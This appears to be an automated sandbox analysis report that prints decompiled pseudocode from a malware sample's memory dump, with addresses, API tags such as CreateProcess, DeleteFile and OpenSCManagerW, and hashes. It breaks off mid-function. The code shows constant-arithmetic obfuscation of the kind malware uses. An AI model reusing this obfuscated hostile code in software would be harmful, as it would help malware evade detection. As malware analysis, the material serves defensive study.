				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0x24032f8e;
				 *(_t279 + 0x4c) = 0x8c7e;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) * 0x17;
				_t171 = _t279 - 0x14; // 0x68cf93e9
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) << 5;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) ^ 0x0193ba3f;
				 *(_t279 + 0x30) = 0x8a4e;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) << 0xc;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) | 0xb22e72a5;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) ^ 0xbaaee90f;
				 *(_t279 + 0x18) = 0x537b;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) >> 0x10;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) ^ 0x00002127;
				E002293A8( *(_t279 + 0x44),  *(_t279 + 0x28),  *(_t279 + 0x24), _t171, 0x1e,  *(_t279 + 0x48));
				_t193 = _t279 - 0x21c; // 0x68cf91e1
				E002293A8( *(_t279 + 0x3c),  *(_t279 + 0x34),  *(_t279 + 0x68), _t193, 0x208,  *(_t279 + 0x1c));
				_t198 = _t279 - 0x424; // 0x68cf8fd9
				E002293A8( *(_t279 + 0xc),  *(_t279 + 0x14),  *(_t279 + 0x10), _t198, 0x208,  *(_t279 + 0x58));
				_t202 = _t279 - 0x21c; // 0x68cf91e1
				E00216636(_t202,  *(_t279 + 0x2c),  *(_t279 + 0x6c),  *(_t279 + 0x60),  *((intOrPtr*)(_t279 + 0x78)));
				_t208 = _t279 - 0x424; // 0x68cf8fd9
				E00216636(_t208,  *(_t279 + 0x40),  *(_t279 + 0x50),  *(_t279 + 0x64),  *((intOrPtr*)(_t279 + 0x7c)));
				 *(_t279 - 0x10) =  *(_t279 + 0x5c);
				_t214 = _t279 - 0x14; // 0x68cf93e9
				_t215 = _t279 - 0x21c; // 0x68cf91e1
				 *((intOrPtr*)(_t279 - 0xc)) = _t215;
				_t217 = _t279 - 0x424; // 0x68cf8fd9
				 *((intOrPtr*)(_t279 - 8)) = _t217;
				 *((short*)(_t279 - 4)) =  *(_t279 + 0x38) |  *(_t279 + 0x20);
				_t253 = E00227BF4(_t214,  *(_t279 + 0x54),  *(_t279 + 0x4c),  *(_t279 + 0x30),  *(_t279 + 0x18)); // executed
				asm("sbb eax, eax");
				return  ~_t253 + 1;
			}

0x00217b64
0x00217b6f
0x00217b72
0x00217b75
0x00217b76
0x00217b77
0x00217b7c
0x00217b85
0x00217b8c
0x00217b90
0x00217b97
0x00217b9e
0x00217ba5
0x00217ba9
0x00217bb0
0x00217bbd
0x00217bbe
0x00217bc1
0x00217bc8
0x00217bcf
0x00217bd6
0x00217bda
0x00217be1
0x00217be8
0x00217bf4
0x00217bf7
0x00217bfe
0x00217c05
0x00217c10
0x00217c13
0x00217c1a
0x00217c21
0x00217c25
0x00217c29
0x00217c30
0x00217c37
0x00217c3e
0x00217c45
0x00217c4c
0x00217c53
0x00217c5a
0x00217c5e
0x00217c65
0x00217c6c
0x00217c70
0x00217c77
0x00217c7a
0x00217c81
0x00217c8c
0x00217c8f
0x00217c96
0x00217c9d
0x00217ca1
0x00217ca8
0x00217caf
0x00217cb6
0x00217cbd
0x00217cc4
0x00217cc8
0x00217ccf
0x00217cd6
0x00217cd9
0x00217ce0
0x00217ce7
0x00217cee
0x00217cf5
0x00217cf9
0x00217d00
0x00217d07
0x00217d12
0x00217d15
0x00217d1c
0x00217d23
0x00217d2a
0x00217d33
0x00217d3a
0x00217d3e
0x00217d42
0x00217d49
0x00217d50
0x00217d53
0x00217d5a
0x00217d61
0x00217d68
0x00217d6f
0x00217d73
0x00217d77
0x00217d7e
0x00217d8a
0x00217d8d
0x00217d90
0x00217d94
0x00217d9b
0x00217da2
0x00217dad
0x00217db4
0x00217db7
0x00217dbe
0x00217dc9
0x00217dcc
0x00217dcf
0x00217dd3
0x00217dda
0x00217de1
0x00217de5
0x00217dec
0x00217df3
0x00217dfa
0x00217dfe
0x00217e14
0x00217e21
0x00217e32
0x00217e3a
0x00217e4b
0x00217e53
0x00217e65
0x00217e6d
0x00217e7c
0x00217e84
0x00217e87
0x00217e8a
0x00217e90
0x00217e93
0x00217e99
0x00217ea5
0x00217eb2
0x00217ebc
0x00217ec4

Strings

6S5q, xrefs: 00217C45
f''e, xrefs: 00217BF7

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID: 6S5q$f''e
API String ID: 3080627654-2864536462
Opcode ID: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
Instruction ID: 6def4888b14afaec450f14e09e182a63b22ed10528eeb4bf6b8ba90f4c46424c
Opcode Fuzzy Hash: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
Instruction Fuzzy Hash: 0FA1DFB140038D9BEF59CF61C9898CE3BB1BF04358F508119FD2A962A0D3BAC959CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0021B41F, Relevance: 2.6, Strings: 2, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0021B41F(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t91;
				signed int* _t93;
				intOrPtr _t95;
				signed int _t103;
				signed int _t104;

				_v44 = _v44 & 0x00000000;
				_v48 = 0x783c80;
				_v8 = 0x978d;
				_v8 = _v8 >> 8;
				_v8 = _v8 >> 5;
				_v8 = _v8 | 0x918d7e28;
				_v8 = _v8 ^ 0x918d7bef;
				_v28 = 0x8ae6;
				_v28 = _v28 + 0xffff2048;
				_v28 = _v28 ^ 0xfffff0f4;
				_v40 = 0x90b0;
				_v40 = _v40 + 0x186c;
				_v40 = _v40 ^ 0x0000e60c;
				_v12 = 0x4bc7;
				_t103 = __edx;
				_v12 = _v12 * 0x77;
				_v12 = _v12 >> 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x000165a0;
				_v36 = 0x87ea;
				_v36 = _v36 | 0x75974cd4;
				_v36 = _v36 ^ 0x75979443;
				_v32 = 0x7f4c;
				_v32 = _v32 ^ 0x8971dc13;
				_v32 = _v32 ^ 0x89718547;
				_v24 = 0xd36b;
				_t104 = 0x3c;
				_v24 = _v24 * 9;
				_v24 = _v24 << 1;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x000045e9;
				_v20 = 0xf34d;
				_v20 = _v20 + 0x5309;
				_v20 = _v20 << 0xa;
				_v20 = _v20 | 0x23e3e3ea;
				_v20 = _v20 ^ 0x27fbee67;
				_v16 = 0xef72;
				_v16 = _v16 * 0x55;
				_v16 = _v16 << 0x10;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0x0225d37d;
				_push(_v28);
				_t91 = E00211000(_v40, _v12, _v36, _v32, E0022889D(_t93, _v8, _v16));
				_t95 =  *0x22ca28; // 0x543138
				 *((intOrPtr*)(_t95 + 0x1c + _t103 * 4)) = _t91;
				return E00222025(_v24, _t90, _v20, _v16);
			}

0x0021b425
0x0021b429
0x0021b430
0x0021b437
0x0021b43b
0x0021b43f
0x0021b446
0x0021b44d
0x0021b454
0x0021b45b
0x0021b462
0x0021b469
0x0021b470
0x0021b477
0x0021b484
0x0021b48a
0x0021b48d
0x0021b491
0x0021b495
0x0021b49c
0x0021b4a3
0x0021b4aa
0x0021b4b1
0x0021b4b8
0x0021b4bf
0x0021b4c6
0x0021b4d1
0x0021b4d2
0x0021b4d5
0x0021b4d8
0x0021b4dc
0x0021b4e3
0x0021b4ea
0x0021b4f1
0x0021b4f5
0x0021b4fc
0x0021b503
0x0021b50e
0x0021b511
0x0021b51a
0x0021b51d
0x0021b524
0x0021b53e
0x0021b543
0x0021b551
0x0021b565

Strings

81T, xrefs: 0021B543
#, xrefs: 0021B4F5

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: 81T$#
API String ID: 1029625771-3272991280
Opcode ID: e29e0883ced5bb3c6a62c2bb1f6977365643dedc29da538d5cd336a6ad97d4c7
Instruction ID: 7a2b947cd974311033c3f98093ce336112e0409ba9cae9079f613bc44eeb0939
Opcode Fuzzy Hash: e29e0883ced5bb3c6a62c2bb1f6977365643dedc29da538d5cd336a6ad97d4c7
Instruction Fuzzy Hash: 6A41ED72C0122AEBDB04CFE5C94A4EEBBB1FB54318F208599C411B62A4D7B90B59CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0021568E, Relevance: 1.4, Strings: 1, Instructions: 184
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E0021568E(void* __ecx, void* __edx) {
				void* _t188;
				void* _t209;
				void* _t210;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				intOrPtr _t242;
				void* _t245;
				void* _t248;
				void* _t249;

				_t248 = _t249 - 0x5c;
				_t242 =  *((intOrPtr*)(_t248 + 0x6c));
				_t245 = __edx;
				_push(0);
				_push( *((intOrPtr*)(_t248 + 0x78)));
				_push( *((intOrPtr*)(_t248 + 0x74)));
				_push( *((intOrPtr*)(_t248 + 0x70)));
				_push(_t242);
				_push( *((intOrPtr*)(_t248 + 0x68)));
				_push( *((intOrPtr*)(_t248 + 0x64)));
				_push(__edx);
				_push(__ecx);
				E0021602B(_t188);
				 *(_t248 + 0x38) = 0xda0c;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) << 7;
				_t215 = 0x75;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) * 0x59;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) ^ 0x25e734ff;
				 *(_t248 + 0x54) = 0xb39d;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) << 6;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) | 0xca3cae0f;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) * 0xe;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) ^ 0x0f551016;
				 *(_t248 + 0x1c) = 0x5da7;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x52b401ed;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) / _t215;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x00b496a1;
				 *(_t248 + 0x30) = 0xba31;
				_t216 = 0x2c;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) / _t216;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) | 0x346b3718;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) ^ 0x346b13e9;
				 *(_t248 + 0x2c) = 0x6402;
				_t217 = 0x3f;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) * 0x14;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) >> 2;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) ^ 0x0001cbcb;
				 *(_t248 + 0x34) = 0x3e45;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) << 0xb;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) >> 2;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) ^ 0x007ce60c;
				 *(_t248 + 0x3c) = 0xfd38;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) + 0xffffe888;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) * 0x69;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) ^ 0x005e4f03;
				 *(_t248 + 0x40) = 0xcc4c;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x07f5c2dc;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) / _t217;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x00207040;
				 *(_t248 + 0x28) = 0x6724;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) + 0xffffafc3;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) << 1;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) ^ 0x000008e0;
				 *(_t248 + 0x24) = 0x9d87;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) >> 6;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) * 0x24;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) ^ 0x00004341;
				 *(_t248 + 0x58) = 0xb89d;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) >> 0xb;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) + 0x8f1;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) << 8;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) ^ 0x00091f00;
				 *(_t248 + 0x44) = 0x534f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) + 0x522f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c12b7e9;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c125009;
				 *(_t248 + 0x20) = 0x7c36;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x32feb437;
				_t218 = 0x73;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) / _t218;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x0071b2de;
				 *(_t248 + 0x4c) = 0x6d80;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xd21e;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xffff4640;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x36936ae7;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x3693cc91;
				 *(_t248 + 0x50) = 0x11c0;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x65d8412a;
				_t219 = 0x49;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) / _t219;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x06211354;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) ^ 0x076544c6;
				 *(_t248 + 0x18) = 0x8ddc;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) | 0x3e354716;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) ^ 0x3e35d915;
				 *(_t248 + 0x14) = 0xfbdb;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) * 0x44;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) ^ 0x0042d7a4;
				 *(_t248 + 0x48) = 0xd404;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) >> 1;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0x728c;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0xfe7d;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) ^ 0x0001b0de;
				_t220 =  *(_t248 + 0x38);
				E002293A8( *(_t248 + 0x38),  *(_t248 + 0x54),  *(_t248 + 0x1c), _t248 - 0x40, 0x44,  *(_t248 + 0x30));
				 *((intOrPtr*)(_t248 - 0x40)) = 0x44;
				_t209 = E0022976F( *(_t248 + 0x2c), _t248 + 4,  *(_t248 + 0x34),  *(_t248 + 0x3c),  *(_t248 + 0x40),  *(_t248 + 0x28), _t248 - 0x40, _t245,  *(_t248 + 0x24),  *(_t248 + 0x38), _t220,  *(_t248 + 0x58),  *(_t248 + 0x44), _t220,  *(_t248 + 0x20),  *(_t248 + 0x4c),  *((intOrPtr*)(_t248 + 0x64)), _t220,  *((intOrPtr*)(_t248 + 0x74))); // executed
				if(_t209 == 0) {
					_t210 = 0;
				} else {
					if(_t242 == 0) {
						E00224F7D( *(_t248 + 0x50),  *(_t248 + 0x18),  *((intOrPtr*)(_t248 + 4)));
						E00224F7D( *(_t248 + 0x14),  *(_t248 + 0x48),  *((intOrPtr*)(_t248 + 8)));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t210 = 1;
				}
				return _t210;
			}

0x0021568f
0x0021569b
0x0021569e
0x002156a0
0x002156a2
0x002156a5
0x002156a8
0x002156ab
0x002156ac
0x002156af
0x002156b2
0x002156b3
0x002156b4
0x002156b9
0x002156c2
0x002156cc
0x002156cf
0x002156d2
0x002156d9
0x002156e0
0x002156e4
0x002156ef
0x002156f2
0x002156f9
0x00215700
0x0021570e
0x00215711
0x00215718
0x00215722
0x00215727
0x0021572c
0x00215733
0x0021573a
0x00215745
0x00215746
0x00215749
0x0021574d
0x00215754
0x0021575b
0x0021575f
0x00215763
0x0021576a
0x00215771
0x0021577c
0x0021577f
0x00215786
0x0021578d
0x00215799
0x0021579c
0x002157a3
0x002157aa
0x002157b1
0x002157b4
0x002157bb
0x002157c2
0x002157ca
0x002157cd
0x002157d4
0x002157db
0x002157df
0x002157e6
0x002157ea
0x002157f1
0x002157f8
0x00215801
0x00215808
0x0021580f
0x00215816
0x00215822
0x00215827
0x0021582c
0x00215833
0x0021583a
0x00215841
0x00215848
0x0021584f
0x00215856
0x0021585d
0x00215867
0x0021586a
0x0021586d
0x00215874
0x0021587b
0x00215882
0x00215889
0x00215890
0x0021589b
0x002158a1
0x002158a8
0x002158af
0x002158b2
0x002158b9
0x002158c0
0x002158d3
0x002158d6
0x002158de
0x00215915
0x0021591f
0x00215951
0x00215921
0x00215923
0x0021593a
0x00215948
0x00215925
0x00215928
0x00215929
0x0021592a
0x0021592b
0x0021592b
0x0021592e
0x0021592e
0x00215959

Strings

@p , xrefs: 0021579C

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID: @p
API String ID: 963392458-2609516012
Opcode ID: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
Instruction ID: b1cc674e54875ef598eccf65792f36baa36f26b825c79db4d69fcf7284d60b61
Opcode Fuzzy Hash: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
Instruction Fuzzy Hash: 54911472510248EFDF59CFA1C98A8CE3BA1FF44348F509119FE16961A0D3BAD995CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0021C0C6, Relevance: 1.4, Strings: 1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0021C0C6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v592;
				void* _t141;
				void* _t159;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t141);
				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v72 = 0x2e7eef;
				_v68 = 0x12a0e3;
				_v36 = 0x822d;
				_v36 = _v36 ^ 0x7542ca13;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00755fa2;
				_v48 = 0xc0ea;
				_t161 = 0x4d;
				_v48 = _v48 * 0x52;
				_v48 = _v48 + 0x53ba;
				_v48 = _v48 ^ 0x003e0539;
				_v8 = 0xf2be;
				_v8 = _v8 ^ 0xca92c6dd;
				_v8 = _v8 | 0xdeb53509;
				_v8 = _v8 + 0x330e;
				_v8 = _v8 ^ 0xdeb75724;
				_v28 = 0xbc60;
				_v28 = _v28 * 3;
				_v28 = _v28 ^ 0x088be546;
				_v28 = _v28 ^ 0x0889fb38;
				_v20 = 0x79be;
				_v20 = _v20 / _t161;
				_t162 = 0x2f;
				_v20 = _v20 * 0x21;
				_v20 = _v20 / _t162;
				_v20 = _v20 ^ 0x000058f8;
				_v12 = 0x6f12;
				_v12 = _v12 + 0x2ef8;
				_v12 = _v12 ^ 0xc4c69b2c;
				_t163 = 0x19;
				_v12 = _v12 / _t163;
				_v12 = _v12 ^ 0x07dec8f1;
				_v16 = 0x233d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0xb86ca57e;
				_v16 = _v16 ^ 0x25a63868;
				_v16 = _v16 ^ 0x9dca839c;
				_v44 = 0x9c92;
				_v44 = _v44 ^ 0x484225af;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x0ae4f7f7;
				_v56 = 0xf3a1;
				_v56 = _v56 + 0xffff3be5;
				_v56 = _v56 ^ 0x00000dea;
				_v24 = 0xe687;
				_v24 = _v24 ^ 0x2fa59812;
				_v24 = _v24 | 0x8a70baf8;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x7fbf04b5;
				_v40 = 0x7d0b;
				_v40 = _v40 + 0xffffa14c;
				_v40 = _v40 + 0x5747;
				_v40 = _v40 ^ 0x000069af;
				_v32 = 0xbccf;
				_v32 = _v32 << 0xb;
				_v32 = _v32 + 0xa312;
				_v32 = _v32 ^ 0x05e7304f;
				_v52 = 0xd186;
				_v52 = _v52 << 7;
				_t164 = 0xc;
				_v52 = _v52 / _t164;
				_v52 = _v52 ^ 0x0008a17f;
				_push(_v48);
				E00227BAF(_v52,  &_v592, _v28, _a4, _v20, _v12, E0022889D(0x22c050, _v36, _v52));
				E00222025(_v16, _t154, _v44, _v56);
				_t159 = E0022AA3C(_v24, _v40, _v32, _v52,  &_v592); // executed
				return _t159;
			}

0x0021c0d0
0x0021c0d3
0x0021c0d6
0x0021c0d9
0x0021c0da
0x0021c0db
0x0021c0e0
0x0021c0e6
0x0021c0ea
0x0021c0f1
0x0021c0f8
0x0021c0ff
0x0021c106
0x0021c10a
0x0021c111
0x0021c11e
0x0021c121
0x0021c124
0x0021c12b
0x0021c132
0x0021c139
0x0021c140
0x0021c147
0x0021c14e
0x0021c155
0x0021c160
0x0021c163
0x0021c16a
0x0021c171
0x0021c17f
0x0021c186
0x0021c189
0x0021c193
0x0021c196
0x0021c19d
0x0021c1a4
0x0021c1ab
0x0021c1b5
0x0021c1b8
0x0021c1bb
0x0021c1c2
0x0021c1c9
0x0021c1cd
0x0021c1d4
0x0021c1db
0x0021c1e2
0x0021c1e9
0x0021c1f0
0x0021c1f4
0x0021c1fb
0x0021c202
0x0021c209
0x0021c210
0x0021c217
0x0021c21e
0x0021c225
0x0021c229
0x0021c230
0x0021c237
0x0021c23e
0x0021c245
0x0021c24c
0x0021c253
0x0021c257
0x0021c25e
0x0021c265
0x0021c26e
0x0021c277
0x0021c27f
0x0021c282
0x0021c289
0x0021c2ad
0x0021c2bd
0x0021c2d5
0x0021c2e1

Strings

~., xrefs: 0021C0EA

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID: ~.
API String ID: 4033686569-2304494891
Opcode ID: 2c8a085faa0ea1dc07c80647c92690f4df0f865d7c4273c919c2db49e1e9f1dc
Instruction ID: dc9a7e7c816dc351e357bfb7f3599ee7a6d988d93f62135ee9f6351d04a1f7f5
Opcode Fuzzy Hash: 2c8a085faa0ea1dc07c80647c92690f4df0f865d7c4273c919c2db49e1e9f1dc
Instruction Fuzzy Hash: 7B511371C1121DEBDF48DFE5D94A8EEBBB2FB08304F208159E511B6260D7B91A58CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00218736, Relevance: .1, Instructions: 56
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00218736(long __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t64;
				signed int _t66;
				signed int _t67;
				signed int _t68;
				long _t77;

				_v16 = 0x5e27;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xcb06;
				_v16 = _v16 + 0xffffffa0;
				_v16 = _v16 ^ 0x0000caae;
				_v20 = 0x53d5;
				_v20 = _v20 << 0xf;
				_v20 = _v20 ^ 0x29eaafbc;
				_v12 = 0x2701;
				_t77 = __ecx;
				_t66 = 0x3f;
				_v12 = _v12 * 0x75;
				_v12 = _v12 / _t66;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x0000510c;
				_v24 = 0xb555;
				_v24 = _v24 | 0xad821aca;
				_v24 = _v24 ^ 0xad82f196;
				_v8 = 0x411b;
				_t67 = 0x67;
				_v8 = _v8 / _t67;
				_t68 = 0x1c;
				_v8 = _v8 / _t68;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00005eaa;
				_t64 = E0022981E(_t77, E0021C506(_t68), _v16, _v12, _v24, _v8); // executed
				return _t64;
			}

0x0021873c
0x00218745
0x00218749
0x00218750
0x00218754
0x0021875b
0x00218762
0x00218766
0x0021876d
0x0021877b
0x0021877d
0x0021877e
0x00218788
0x0021878d
0x00218791
0x00218798
0x0021879f
0x002187a6
0x002187ad
0x002187b7
0x002187bc
0x002187c4
0x002187c7
0x002187ca
0x002187ce
0x002187ed
0x002187f9

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
Instruction ID: 0b8a60534059b33956c13f16b6afba42a25f241396393e0f0ffdd27f89b89476
Opcode Fuzzy Hash: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
Instruction Fuzzy Hash: 78214271D00209EBEB08DFA9D94A4DEBBB2EB44304F208199E415B7294E7B51B64DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00212959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0021602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0021295f
0x00212964
0x00212967
0x0021296a
0x0021296d
0x0021296e
0x0021296f
0x00212977
0x00212985
0x0021298a
0x00212992
0x0021299a
0x002129a2
0x002129a9
0x002129b0
0x002129b7
0x002129bb
0x002129cf
0x002129dc
0x002129e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC

Strings

<^, xrefs: 00212977

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0021C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0021602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
